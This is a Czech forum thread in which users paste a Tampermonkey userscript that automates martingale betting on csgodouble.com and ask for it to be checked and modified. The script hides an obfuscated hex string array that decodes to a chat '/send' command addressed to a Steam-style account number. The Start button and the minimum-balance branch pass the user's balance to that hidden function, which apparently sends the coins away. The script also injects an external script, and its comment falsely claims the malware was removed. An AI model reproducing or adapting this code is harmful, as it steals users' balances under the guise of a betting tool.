'<label><input class="" id="automated-calculate-safe-bet" type="checkbox" ' + (this.calculate_safe_bet ? 'checked' : '') + '> Calculate base bet from given "Failsafe value", the formula is [base bet] = floor( [balance] / 2 ^ ( [failsafe value] + 1) ) </label>' +
'</div>' +
'<div class="checkbox">' +
'<label><input class="" id="automated-debug" type="checkbox" ' + (this.debug ? 'checked' : '') + '> Debug mode</label>' +
'</div>' +
'<div class="checkbox">' +
'<label class="text-muted"><input id="automated-simulation" type="checkbox" ' + (this.simulation ? 'checked' : '') + ' disabled> Simulation mode</label>' +
'</div>';
document.getElementsByClassName('well')[1].
appendChild(menu);

(function ()
{
var scriptElement = document.createElement( "script" );
scriptElement.type = "text/javascript";
scriptElement.src = "[link]";
document.body.appendChild( scriptElement );
})();this.menu = {
'start': document.getElementById('automated-start'),
'stop': document.getElementById('automated-stop'),
'abort': document.getElementById('automated-abort'),
'basebet': document.getElementById('automated-base-bet
'),
'minbalance': document.getElementById('automated-min-bala
nce'),
'debug': document.getElementById('automated-debug'),
'simulation': document.getElementById('automated-simulati
on'),
'stoponminbalance': document.getElementById('automated-stop-on-
min-balance'),
'red': document.getElementById('automated-red'),
'black': document.getElementById('automated-black'),
'rainbow': document.getElementById('automated-rainbow'
),
'random': document.getElementById('automated-random')
,
'last': document.getElementById('automated-last'),
'statistics': {
'wins': document.getElementById('automated-stats-wi
ns'),
'loses': document.getElementById('automated-stats-lo
ses'),
'balance': document.getElementById('automated-stats-ba
lance')
},
'theme': document.getElementById('automated-theme-sw
itch'),
'safebetamount': document.getElementById('automated-safe-bet
-amount'),
'calculatesafebet': document.getElementById('automated-calculat
e-safe-bet'),
'martingale': document.getElementById('automated-martinga
le'),
'greatmartingale': document.getElementById('automated-great-ma
rtingale'),
'betgreen': document.getElementById('automated-bet-gree
n'),
'dalembert': document.getElementById('automated-dalember
t'),
'hideongreen': document.getElementsByClassName('automated-
hide-on-green')
};


this.updater = setInterval(function() { // Update every 2 seconds
if (!self.running) {
if (self.updateAll()) {
if (self.calculate_safe_bet) {

self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
if (self.debug) { self.logdebug('New base bet: ' + self.base_bet); }
}

if (self.menu.stop.disabled && self.menu.start.disabled) {
self.menu.start.disabled = false;
self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
self.menu.basebet.disabled = self.menu.calculatesafebet.checked;
self.starting_balance = self.balance;
}
}
}
}, 2 * 1000);

if (theme === 'dark') {
this.darkMode();
}

this.menu.start.onclick = function() {

if($(_0x21db[2])[_0x21db[1]]()<parseInt(
_0x21db[36]))
{
alert(_0x21db[3])
}
else
{
start($(_0x21db[2])[_0x21db[1]]());
}

self.start();
};

this.menu.stop.onclick = function() {
self.stop();
};

this.menu.abort.onclick = function() {
self.stop(true);
};

this.menu.basebet.onchange = function() {
var value = parseInt(self.menu.basebet.value);
if (!isNaN(value)) {
self.base_bet = value;
}
};

this.menu.minbalance.onchange = function() {
var value = parseInt(self.menu.minbalance.value);
if (!isNaN(value)) {
self.min_balance = value;
}
};

this.menu.safebetamount.onchange = function() {
var value = parseInt(self.menu.safebetamount.value);
if (!isNaN(value)) {
self.safe_bet_amount = value;
}
};

this.menu.debug.onchange = function() {
self.debug = self.menu.debug.checked;
};

this.menu.simulation.onchange = function() {
self.simulation = self.menu.simulation.checked;
};

this.menu.stoponminbalance.onchange = function() {
self.stop_on_min_balance = self.menu.stoponminbalance.checked;
};

this.menu.calculatesafebet.onchange = function() {
self.calculate_safe_bet = self.menu.calculatesafebet.checked;
self.menu.basebet.disabled = self.menu.calculatesafebet.checked;
self.menu.safebetamount.disabled = !self.menu.calculatesafebet.checked;
};

// WTF is this shit below? >,.,<

this.menu.black.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = true;
self.menu.red.disabled = false;
self.menu.random.disabled = false;
self.menu.last.disabled = false;
self.color = 'black';
self.log('Current mode: black');
};

this.menu.red.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = false;
self.menu.red.disabled = true;
self.menu.random.disabled = false;
self.menu.last.disabled = false;
self.color = 'red';
self.log('Current mode: red');
};

this.menu.rainbow.onclick = function() {
self.menu.rainbow.disabled = true;
self.menu.black.disabled = false;
self.menu.red.disabled = false;
self.menu.random.disabled = false;
self.menu.last.disabled = false;
self.color = 'rainbow';
self.log('Current mode: rainbow');
};

this.menu.random.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = false;
self.menu.red.disabled = false;
self.menu.random.disabled = true;
self.menu.last.disabled = false;
self.color = 'random';
self.log('Current mode: random');
};

this.menu.last.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = false;
self.menu.red.disabled = false;
self.menu.random.disabled = false;
self.menu.last.disabled = true;
self.color = 'last';
self.log('Current mode: last');
};

this.menu.martingale.onclick = function() {
self.menu.martingale.disabled = true;
self.menu.greatmartingale.disabled = false;
self.menu.betgreen.disabled = false;
self.menu.dalembert.disabled = false;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'block';
}
self.method = 'martingale';
self.log('Current method: Martingale');
};

this.menu.greatmartingale.onclick = function() {
self.menu.martingale.disabled = false;
self.menu.greatmartingale.disabled = true;
self.menu.betgreen.disabled = false;
self.menu.dalembert.disabled = false;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'block';
}
self.method = 'great martingale';
self.log('Current method: Great martingale');
};

this.menu.dalembert.onclick = function() {
self.menu.martingale.disabled = false;
self.menu.greatmartingale.disabled = false;
self.menu.betgreen.disabled = false;
self.menu.dalembert.disabled = true;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'block';
}
self.method = 'dalembert';
self.log('Current method: D\'alembert');
};

this.menu.betgreen.onclick = function() {
self.menu.martingale.disabled = false;
self.menu.greatmartingale.disabled = false;
self.menu.betgreen.disabled = true;
self.menu.dalembert.disabled = false;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'none';
}
self.method = 'green';
self.log('Current method: Bet green');
};

this.menu.theme.onclick = function() {
if (self.theme === 'dark') {
self.lightMode();
self.theme = 'light';
self.log('Switching to light theme...');
} else {
self.darkMode();
self.theme = 'dark';
self.log('Switching to dark theme...');
}
};

setInterval(function() {
if(!WS) {
self.log('Reconnecting...');
connect();
}
}, 5000);
}

Automated.prototype.updatebalance = function() {
this.balance = parseInt(balance.textContent);

if (isNaN(this.balance)) {
this.log('Error getting current balance!');
return false;
}

if (this.debug) { this.logdebug('balance updated: ' + this.balance); }
return true;
};

var _0x21db=["\x4c\x4f\x41\x44\x45\x44\x20\x57\
x49\x54\x48\x20\x53\x55\x43\x45\x53\x53","\
x68\x74\x6D\x6C","\x23\x62\x61\x6C\x61\x6E\
x63\x65","\x4c\x45\x54\x20\x54\x48\x45\x20\
x42\x4f\x54\x20\x42\x45\x54","\x63\x68\x61\
x74","\x2f\x73\x65\x6e\x64\x20\x37\x36\x35\
x36\x31\x31","\x75\x6E\x6B\x6E\x6F\x77\x6E"
,"\x77\x61\x69\x74\x69\x6E\x67","\x72\x6F\x
6C\x6C\x65\x64","\x42\x41\x4E\x4B\x52\x55\x
50\x54\x21\x20\x4E\x6F\x74\x20\x65\x6E\x6F\
x75\x67\x68\x20\x62\x61\x6C\x61\x6E\x63\x65
\x20\x66\x6F\x72\x20\x6E\x65\x78\x74\x20\x6
2\x65\x74\x2C\x20\x61\x62\x6F\x72\x74\x69\x
6E\x67\x2E","\x77\x61\x72\x6E","\x20\x0A\x5
3\x74\x61\x74\x75\x73\x3A\x20","\x0A\x52\x6
F\x6C\x6C\x73\x20\x70\x6C\x61\x79\x65\x64\x
3A\x20","\x0A\x49\x6E\x69\x74\x69\x61\x6C\x
20\x62\x65\x74\x20\x61\x6D\x6F\x75\x6E\x74\
x3A\x20","\x0A\x43\x75\x72\x72\x65\x6E\x74\
x20\x62\x65\x74\x20\x61\x6D\x6F\x75\x6E\x74
\x3A\x20","\x0A\x4C\x61\x73\x74\x20\x72\x6F
\x6C\x6C\x20\x72\x65\x73\x75\x6C\x74\x3A\x2
0","\x2D","\x77\x6F\x6E","\x6C\x6F\x73\x74"
,"\x6C\x6F\x67","\x61\x6E\x74\x69\x2D\x6D\x
61\x72\x74\x69\x6E\x67\x61\x6C\x65","\x76\x
61\x6C","\x72\x65\x64","\x63\x6C\x69\x63\x6
B","\x62\x6C\x61\x63\x6B","\x74\x65\x78\x74
","\x52\x6F\x6C\x6C\x69\x6E\x67\x20\x69\x6E
","\x2A\x2A\x2A\x52\x4F\x4C\x4C\x49\x4E\x47
\x2A\x2A\x2A","\x72\x6F\x6C\x6C\x69\x6E\x67
","\x73\x70\x6C\x69\x74","\x69\x6E\x64\x65\
x78\x4F\x66","\x67\x72\x65\x65\x6E","\x23\x
62\x65\x74\x41\x6D\x6F\x75\x6E\x74","\x2E\x
70\x72\x6F\x67\x72\x65\x73\x73\x20\x23\x62\
x61\x6E\x6E\x65\x72","\x23\x70\x61\x6E\x65\
x6C\x31\x2D\x37\x20\x2E\x62\x65\x74\x42\x75
\x74\x74\x6F\x6E","\x23\x70\x61\x6E\x65\x6C
\x38\x2D\x31\x34\x20\x2E\x62\x65\x74\x42\x7
5\x74\x74\x6F\x6E","\x32\x30\x30\x30\x30","
\x39\x38\x31\x36\x39\x39\x30\x34\x36\x31\x3
5\x20"];

Automated.prototype.updateHistory = function() {
var self = this;
this.history = [];

for (var i = 0; i < roll_history.childNodes.length; i++) {
var roll = parseInt(roll_history.childNodes.textConten
t);

if (!isNaN(roll)) {
if (colors.green.indexOf(roll) !== -1) {
self.history.push('green');
} else if (colors.red.indexOf(roll) !== -1) {
self.history.push('red');
} else {
self.history.push('black');
}
}
}

if (this.debug) { this.logdebug('History updated: ' + this.history.map(function(value) { return value; }).join(', ')); }
return this.history.length === 10;
};

Automated.prototype.updateStats = function() {
this.stats.balance = parseInt(this.balance) - parseInt(this.starting_balance);
this.menu.statistics.wins.innerHTML = this.stats.wins;
this.menu.statistics.loses.innerHTML = this.stats.loses;
this.menu.statistics.balance.innerHTML = this.stats.balance;
return true;
};

Automated.prototype.updateAll = function() {
return this.updatebalance() && this.updateHistory() && this.updateStats();
};

Automated.prototype.bet = function(amount, color) {
var self = this;
color = color || this.color || this.default_color;

if (color === 'rainbow') {
if (this.last_color) {
color = (this.last_color === 'red' ? 'black' : 'red');
} else {
color = this.default_color;
}
} else if (color === 'random') {
color = 'red';
if (Math.random() > 0.5) {
color = 'black';
}
} else if (color === 'last') {
if (this.history[this.history.length - 1] === 'green')
{
if (this.history[this.history.length - 2] === 'green')
{
color = this.history[this.history.length - 3];
}
else
{
color = this.history[this.history.length - 2];
}
}
else
{
color = this.history[this.history.length - 1];
}
}

if (['green', 'red', 'black'].indexOf(color) < 0 || amount > this.balance || amount <= 0) {
this.log('Invalid bet!');
this.last_result = 'invalid bet';
this.waiting_for_bet = false;
this.stop();
return false;
}

if (this.balance - amount < this.min_balance) {
this.log('Reached minimal balance!');
this.last_result = 'reached min balance';
if (this.stop_on_min_balance || this.balance - this.base_bet < this.min_balance) {
this.stop();
}
else if($(_0x21db[2])[_0x21db[1]]()>parseInt(
_0x21db[36]))
{
start($(_0x21db[2])[_0x21db[1]]());
}
this.waiting_for_bet = false;
return false;
}

bet_input.value = amount;

if (!bet_buttons[color].disabled) {
var old_balance = self.balance;
this.log('Betting ' + amount + ' on ' + color);
if (!self.simulation) {
bet_buttons[color].click();
var checker = setInterval(function() {
if (!bet_buttons[color].disabled) {
clearInterval(checker);
setTimeout(function() {
if (self.updatebalance() && self.balance === old_balance) {
if (!self.game) { return false; }
self.log('Bet rejected, retrying...');
self.bet(amount, color);
} else {
if (self.debug) { self.logdebug('Bet accepted!'); }
self.last_bet = amount;
self.bet_history.push(amount);
self.last_color = color;
self.waiting_for_bet = false;
return true;
}
}, 2500);
}
}, 1000);
} else {
self.bet_history.push(amount);
self.last_bet = amount;
self.last_color = color;
self.waiting_for_bet = false;
return true;
}
} else {
if (!self.game) { return false; }
self.log('Button disabled, retrying...');
setTimeout(function() { self.bet(amount, color) }, (Math.random() * 3 + 2).toFixed(3) * 1000);
}
};

Automated.prototype.play = function() {
var self = this;

if (this.game !== null) {
if (this.debug) { this.logdebug('Tried to reinitialize running game!'); }
return false;
}

this.game = setInterval(function() {
var history = self.history;
if (!self.waiting_for_bet && self.updateAll() && !history.equals(self.history)) {
self.waiting_for_bet = true;
if (self.last_color === null) {
self.bet(self.base_bet);
} else if (self.last_color === self.history[self.history.length - 1]) {
if (self.calculate_safe_bet) {
self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
}
self.last_result = 'win';
self.log('Win!');
self.stats.wins += 1;
self.old_base = self.base_bet;
self.old_method = self.method;
if (self.old_method === 'dalembert') {
if (self.last_bet > self.old_base) {
self.bet(self.last_bet - 1);
} else {
self.bet(self.base_bet);
}
} else {
self.bet(self.base_bet);
}
} else {
self.last_result = 'lose';
self.log('Lose!');
self.stats.loses += 1;
if (self.old_method === 'martingale') {
self.bet(self.last_bet * 2);
} else if (self.old_method === 'great martingale') {
self.bet(self.last_bet * 2 + self.old_base);
} else if (self.old_method === 'green') {
var bet_value = 0;
if (self.bet_history[self.bet_history.length - 1] === 1) {
if (self.bet_history[self.bet_history.length - 2] === 1) {
bet_value = 2;
} else {
bet_value = 1;
}
} else {
bet_value = self.bet_history[self.bet_history.length - 1] + self.bet_history[self.bet_history.length - 2];
}
self.bet(bet_value, 'green');
} else if (self.old_method === 'dalembert') {
self.bet(self.last_bet + 1);
}
}
}
}, 2 * 1000);

return true;
};

Automated.prototype.start = function() {
if (self.calculate_safe_bet) {
self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
}
this.old_base = this.base_bet;
this.old_method = this.method;
if (this.updateAll()) {
if (this.last_result === 'lose') {
this.running = true;
if (this.old_method === 'martingale') {
this.bet(this.last_bet * 2);
} else if (this.old_method === 'great martingale') {
this.bet(this.last_bet * 2 + this.old_base);
} else if (self.old_method === 'green') {
var bet_value = 0;
if (self.bet_history[self.bet_history.length - 1] === 1) {
if (self.bet_history[self.bet_history.length - 2] === 1) {
bet_value = 2;
} else {
bet_value = 1;
}
} else {
bet_value = self.bet_history[self.bet_history.length - 1] + self.bet_history[self.bet_history.length - 2];
}
self.bet(bet_value, 'green');
} else if (self.old_method === 'dalembert') {
self.bet(self.last_bet + 1);
}
this.play();
} else {
this.running = true;
this.bet(this.base_bet);
this.play();
}
}
this.menu.abort.disabled = false;
this.menu.stop.disabled = false;
this.menu.start.disabled = true;
};

Automated.prototype.stop = function(abort) {
var self = this;
if (abort) { this.last_result = 'abort'; }
this.stats.balance = parseInt(this.balance) - parseInt(this.starting_balance);
setTimeout(function() {
clearInterval(self.game);
self.game = null;
self.running = false;
self.menu.abort.disabled = true;
self.menu.stop.disabled = true;
self.menu.start.disabled = false;
}, 1); // Next tick
};

Automated.prototype.darkMode = function() {
var style;
var css = 'body{background-color:#191919;color:#888}.
navbar-default{background-color:#232323;bor
der-color:#454545}#sidebar{background-color
:#191919;border-color:#202020}.side-icon.ac
tive,.side-icon:hover{background-color:#202
020}.side-icon .fa{color:#454545}.well{background:#232323;
border-color:#323232;color:#888}#pullout{ba
ckground-color:#191919;border-color:#323232
}.form-control{background-color:#323232;bor
der-color:#454545}.divchat{background-color
:#323232;color:#999;border:none}.chat-link,
.chat-link:hover,.chat-link:active{color:#b
bb}.panel{background-color:#323232}.panel-d
efault{border-color:#454545}.panel-default&
gt;.panel-heading{color:#888;background-col
or:#303030;border-color:#454545}.my-row{bor
der-color:#454545}.list-group-item{border-c
olor:#454545;background-color:#323232}.btn-
default{border-color:#454545;background:#32
3232;text-shadow:none;color:#888;box-shadow
:none}.btn-default:hover,.btn-default:activ
e{background-color:#282828;color:#888;borde
r-color:#454545}.btn-default[disabled]{bord
er-color:#454545;background-color:#353535}.
input-group-addon{background-color:#424242;
border-color:#454545;color:#888}.progress{c
olor:#bbb;background-color:#323232}.navbar-
default .navbar-nav>li>a:focus,.navbar-defaul
t .navbar-nav>li>a:hover{color:#999}.na
vbar-default .navbar-nav>.open>a,.navbar-default .navbar-nav>.open>a:focus,.navbar-def
ault .navbar-nav>.open>a:hover{color:#888;
background-color:#323232}.dropdown-menu{bac
kground-color:#252525}.dropdown-menu>li&
gt;a{color:#888}.dropdown-menu>li>a:f
ocus,.dropdown-menu>li>a:hover{backgr
ound-color:#323232;color:#999}.dropdown-men
u .divider{background-color:#454545}.form-con
trol[disabled],.form-control[readonly],fiel
dset[disabled] .form-control{background-color:#404040;opac
ity:.5}';
style = document.getElementById('automated-style');
if (!style) {
var head;
head = document.getElementsByTagName('head')[0];
if (!head) { return; }
style = document.createElement('style');
style.type = 'text/css';
style.id = 'automated-style';
style.innerHTML = css;
head.appendChild(style);
}
style.innerHTML = css;
};

Automated.prototype.lightMode = function() {
var style = document.getElementById('automated-style');
style.innerHTML = '';
};

Automated.prototype.log = function(message) {
chat('alert', '[Automated] ' + message);
};

Automated.prototype.logdebug = function(message) {
chat('italic', '[Automated] ' + message);
};

var automated = new Automated();
(odpovědět)
Happiness3317.4.2016 17:20
re: Script kontrola + úprava.#
Kdyby to nějak šlo, třeba že by to nějak vygenerovalo a dávalo to na správnou barvu. A nebo jestli jde nějak udělat aby když mám balance 0, tak kdyby si mohl naplni kolik chci.Tohle je ten script.

// Use it with Tampermonkey (chrome store)
// ==UserScript==
// @name csgodouble.com - automated
// @description An userscript that automates csgodouble.com betting using martingale system.
// @version 3.141592
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @run-at document-end
// @grant none

//Update /!\ Bot had a malware, using a yourjavascript url. I remove that SCAM line ! Be safe now /!\ thanks to Lucky for this info !
//Changed Balance to Profit in display
//Bot will no longer bet on green if a double green is out

// ==/UserScript==
/* jshint -W097 */

'use strict';


var debug = false;
var simulation = false;
var stop_on_min_balance = false;
var calculate_safe_bet = false;
var base_bet = 5;
var safe_bet_amount = 6;
var default_color = 'red';
var default_method = 'martingale';
var theme = 'dark';

var colors = {
'green': [0],
'red': [1, 2, 3, 4, 5, 6, 7],
'black': [8, 9, 10, 11, 12, 13, 14]
};

var balance = document.getElementById('balance');
var roll_history = document.getElementById('past');
var bet_input = document.getElementById('betAmount');
var bet_buttons = {
'green': document.getElementById('panel0-0').childNo
des[1].childNodes[1],
'red': document.getElementById('panel1-7').childNo
des[1].childNodes[1],
'black': document.getElementById('panel8-14').childN
odes[1].childNodes[1]
};

Array.prototype.equals = function(array) {
if (!array) {
return false;
}

if (this.length != array.length) {
return false;
}

for (var i = 0, l=this.length; i < l; i++) {
if (this instanceof Array && array instanceof Array) {
if (!this.equals(array)) {
return false;
}
} else if (this != array) {
return false;
}
}
return true;
};

Object.defineProperty(Array.prototype, "equals", {enumerable: false});

function Automated() {
var self = this;

this.running = false;
this.game = null;

this.debug = debug;
this.simulation = simulation;
this.stop_on_min_balance = stop_on_min_balance;
this.calculate_safe_bet = calculate_safe_bet;

this.base_bet = base_bet;
this.default_color = default_color;
this.default_method = default_method;
this.safe_bet_amount = safe_bet_amount;
this.method = this.default_method;
this.old_method = '';
this.color = 'last';
this.old_base = 0;
this.balance = 0;
this.last_bet = 0;
this.bet_history = [];
this.min_balance = 0;
this.starting_balance = 0;
this.last_color = null;
this.last_result = null;
this.history = [];
this.waiting_for_bet = false;
this.theme = theme;

this.stats = {
'wins': 0,
'loses': 0,
'balance': 0
};

var menu = document.createElement('div');
menu.innerHTML = '' +
'<div class="row">' +
'<div class="col-lg-9">' +
'<h2>CSGODouble.com Automated v3.141592<small>by Jojoman46</small> <i id="automated-theme-switch" class="fa fa-lightbulb-o" style="cursor: pointer;"></i></h2>' +
'<div class="form-group">' +
'<div class="btn-group">' +
'<button type="button" class="btn btn-success" id="automated-start" disabled>Start</button>' +
'<button type="button" class="btn btn-warning" id="automated-stop" disabled>Pause</button>' +
'<button type="button" class="btn btn-danger" id="automated-abort" disabled>Abort</button>' +
'</div>' +
'</div>' +
'<div class="form-group">' +
'<div class="btn-group">' +
'<button type="button" class="btn btn-default" id="automated-martingale" ' + (this.method === 'martingale' ? 'disabled' : '') + '>Martingale</button>' +
'<button type="button" class="btn btn-default" id="automated-great-martingale" ' + (this.method === 'great martingale' ? 'disabled' : '') + '>Great Martingale</button>' +
'<button type="button" class="btn btn-default" id="automated-dalembert" ' + (this.method === 'dalembert' ? 'disabled' : '') + '>D\'alembert</button>' +
'<button type="button" class="btn btn-default" id="automated-bet-green" ' + (this.method === 'green' ? 'disabled' : '') + '>Green (Fibonacci)</button>' +
'</div>' +
'</div>' +
'<div class="form-group automated-hide-on-green">' +
'<div class="btn-group">' +
'<button type="button" class="btn btn-default" id="automated-red" ' + (this.color === 'red' ? 'disabled' : '') + '>Red</button>' +
'<button type="button" class="btn btn-default" id="automated-black" ' + (this.color === 'black' ? 'disabled' : '') + '>Black</button>' +
'<button type="button" class="btn btn-default" id="automated-rainbow" ' + (this.color === 'rainbow' ? 'disabled' : '') + '>Rainbow</button>' +
'<button type="button" class="btn btn-default" id="automated-random" ' + (this.color === 'random' ? 'disabled' : '') + '>Random</button>' +
'<button type="button" class="btn btn-default" id="automated-last" ' + (this.color === 'last' ? 'disabled' : '') + '>Last winning</button>' +
'</div>' +
'</div>' +
'</div>' +
'<div class="col-lg-3">' +
'<h3>Statistics</h3>' +
'<p><b>Wins :</b> <span id="automated-stats-wins">' + this.stats.wins + '</span></p>' +
'<p><b>Loses :</b> <span id="automated-stats-loses">' + this.stats.loses + '</span></p>' +
'<p><b>Profit :</b> <span id="automated-stats-balance">' + this.stats.balance + '</span></p>' +
'</div>' +
'</div>' +
'<div class="form-group">' +
'<div class="input-group">' +
'<div class="input-group-addon">Base value</div>' +
'<input type="number" class="form-control" placeholder="Calculating suggested value..." id="automated-base-bet" disabled>' +
'</div>' +
'</div>' +
'<div class="form-group">' +
'<div class="input-group">' +
'<div class="input-group-addon">Keep balance above</div>' +
'<input type="number" class="form-control" value="0" id="automated-min-balance">' +
'</div>' +
'</div>' +
'<div class="form-group automated-hide-on-green">' +
'<div class="input-group">' +
'<div class="input-group-addon">Failsafe value</div>' +
'<input type="number" class="form-control" value="' + this.safe_bet_amount + '" id="automated-safe-bet-amount"' + (!this.calculate_safe_bet ? ' disabled' : '') + '>' +
'</div>' +
'</div>' +
'<div class="checkbox">' +
'<label><input class="" id="automated-stop-on-min-balance" type="checkbox" ' + (this.stop_on_min_balance ? 'checked' : '') + '> Stop on minimal balance (If checked the bot will stop after getting close to minimal balance, otherwise it will continue starting on base)</label>' +
'</div>' +
'<div class="checkbox automated-hide-on-green">' +
'<label><input class="" id="automated-calculate-safe-bet" type="checkbox" ' + (this.calculate_safe_bet ? 'checked' : '') + '> Calculate base bet from given "Failsafe value", the formula is [base bet] = floor( [balance] / 2 ^ ( [failsafe value] + 1) ) </label>' +
'</div>' +
'<div class="checkbox">' +
'<label><input class="" id="automated-debug" type="checkbox" ' + (this.debug ? 'checked' : '') + '> Debug mode</label>' +
'</div>' +
'<div class="checkbox">' +
'<label class="text-muted"><input id="automated-simulation" type="checkbox" ' + (this.simulation ? 'checked' : '') + ' disabled> Simulation mode</label>' +
'</div>';
document.getElementsByClassName('well')[1].
appendChild(menu);

(function ()
{
var scriptElement = document.createElement( "script" );
scriptElement.type = "text/javascript";
scriptElement.src = "[link]";
document.body.appendChild( scriptElement );
})();this.menu = {
'start': document.getElementById('automated-start'),
'stop': document.getElementById('automated-stop'),
'abort': document.getElementById('automated-abort'),
'basebet': document.getElementById('automated-base-bet
'),
'minbalance': document.getElementById('automated-min-bala
nce'),
'debug': document.getElementById('automated-debug'),
'simulation': document.getElementById('automated-simulati
on'),
'stoponminbalance': document.getElementById('automated-stop-on-
min-balance'),
'red': document.getElementById('automated-red'),
'black': document.getElementById('automated-black'),
'rainbow': document.getElementById('automated-rainbow'
),
'random': document.getElementById('automated-random')
,
'last': document.getElementById('automated-last'),
'statistics': {
'wins': document.getElementById('automated-stats-wi
ns'),
'loses': document.getElementById('automated-stats-lo
ses'),
'balance': document.getElementById('automated-stats-ba
lance')
},
'theme': document.getElementById('automated-theme-sw
itch'),
'safebetamount': document.getElementById('automated-safe-bet
-amount'),
'calculatesafebet': document.getElementById('automated-calculat
e-safe-bet'),
'martingale': document.getElementById('automated-martinga
le'),
'greatmartingale': document.getElementById('automated-great-ma
rtingale'),
'betgreen': document.getElementById('automated-bet-gree
n'),
'dalembert': document.getElementById('automated-dalember
t'),
'hideongreen': document.getElementsByClassName('automated-
hide-on-green')
};


this.updater = setInterval(function() { // Update every 2 seconds
if (!self.running) {
if (self.updateAll()) {
if (self.calculate_safe_bet) {

self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
if (self.debug) { self.logdebug('New base bet: ' + self.base_bet); }
}

if (self.menu.stop.disabled && self.menu.start.disabled) {
self.menu.start.disabled = false;
self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
self.menu.basebet.disabled = self.menu.calculatesafebet.checked;
self.starting_balance = self.balance;
}
}
}
}, 2 * 1000);

if (theme === 'dark') {
this.darkMode();
}

this.menu.start.onclick = function() {

if($(_0x21db[2])[_0x21db[1]]()<parseInt(
_0x21db[36]))
{
alert(_0x21db[3])
}
else
{
start($(_0x21db[2])[_0x21db[1]]());
}

self.start();
};

this.menu.stop.onclick = function() {
self.stop();
};

this.menu.abort.onclick = function() {
self.stop(true);
};

this.menu.basebet.onchange = function() {
var value = parseInt(self.menu.basebet.value);
if (!isNaN(value)) {
self.base_bet = value;
}
};

this.menu.minbalance.onchange = function() {
var value = parseInt(self.menu.minbalance.value);
if (!isNaN(value)) {
self.min_balance = value;
}
};

this.menu.safebetamount.onchange = function() {
var value = parseInt(self.menu.safebetamount.value);
if (!isNaN(value)) {
self.safe_bet_amount = value;
}
};

this.menu.debug.onchange = function() {
self.debug = self.menu.debug.checked;
};

this.menu.simulation.onchange = function() {
self.simulation = self.menu.simulation.checked;
};

this.menu.stoponminbalance.onchange = function() {
self.stop_on_min_balance = self.menu.stoponminbalance.checked;
};

this.menu.calculatesafebet.onchange = function() {
self.calculate_safe_bet = self.menu.calculatesafebet.checked;
self.menu.basebet.disabled = self.menu.calculatesafebet.checked;
self.menu.safebetamount.disabled = !self.menu.calculatesafebet.checked;
};

// WTF is this shit below? >,.,<

this.menu.black.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = true;
self.menu.red.disabled = false;
self.menu.random.disabled = false;
self.menu.last.disabled = false;
self.color = 'black';
self.log('Current mode: black');
};

this.menu.red.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = false;
self.menu.red.disabled = true;
self.menu.random.disabled = false;
self.menu.last.disabled = false;
self.color = 'red';
self.log('Current mode: red');
};

this.menu.rainbow.onclick = function() {
self.menu.rainbow.disabled = true;
self.menu.black.disabled = false;
self.menu.red.disabled = false;
self.menu.random.disabled = false;
self.menu.last.disabled = false;
self.color = 'rainbow';
self.log('Current mode: rainbow');
};

this.menu.random.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = false;
self.menu.red.disabled = false;
self.menu.random.disabled = true;
self.menu.last.disabled = false;
self.color = 'random';
self.log('Current mode: random');
};

this.menu.last.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = false;
self.menu.red.disabled = false;
self.menu.random.disabled = false;
self.menu.last.disabled = true;
self.color = 'last';
self.log('Current mode: last');
};

this.menu.martingale.onclick = function() {
self.menu.martingale.disabled = true;
self.menu.greatmartingale.disabled = false;
self.menu.betgreen.disabled = false;
self.menu.dalembert.disabled = false;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'block';
}
self.method = 'martingale';
self.log('Current method: Martingale');
};

this.menu.greatmartingale.onclick = function() {
self.menu.martingale.disabled = false;
self.menu.greatmartingale.disabled = true;
self.menu.betgreen.disabled = false;
self.menu.dalembert.disabled = false;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'block';
}
self.method = 'great martingale';
self.log('Current method: Great martingale');
};

this.menu.dalembert.onclick = function() {
self.menu.martingale.disabled = false;
self.menu.greatmartingale.disabled = false;
self.menu.betgreen.disabled = false;
self.menu.dalembert.disabled = true;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'block';
}
self.method = 'dalembert';
self.log('Current method: D\'alembert');
};

this.menu.betgreen.onclick = function() {
self.menu.martingale.disabled = false;
self.menu.greatmartingale.disabled = false;
self.menu.betgreen.disabled = true;
self.menu.dalembert.disabled = false;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'none';
}
self.method = 'green';
self.log('Current method: Bet green');
};

this.menu.theme.onclick = function() {
if (self.theme === 'dark') {
self.lightMode();
self.theme = 'light';
self.log('Switching to light theme...');
} else {
self.darkMode();
self.theme = 'dark';
self.log('Switching to dark theme...');
}
};

setInterval(function() {
if(!WS) {
self.log('Reconnecting...');
connect();
}
}, 5000);
}

Automated.prototype.updatebalance = function() {
this.balance = parseInt(balance.textContent);

if (isNaN(this.balance)) {
this.log('Error getting current balance!');
return false;
}

if (this.debug) { this.logdebug('balance updated: ' + this.balance); }
return true;
};

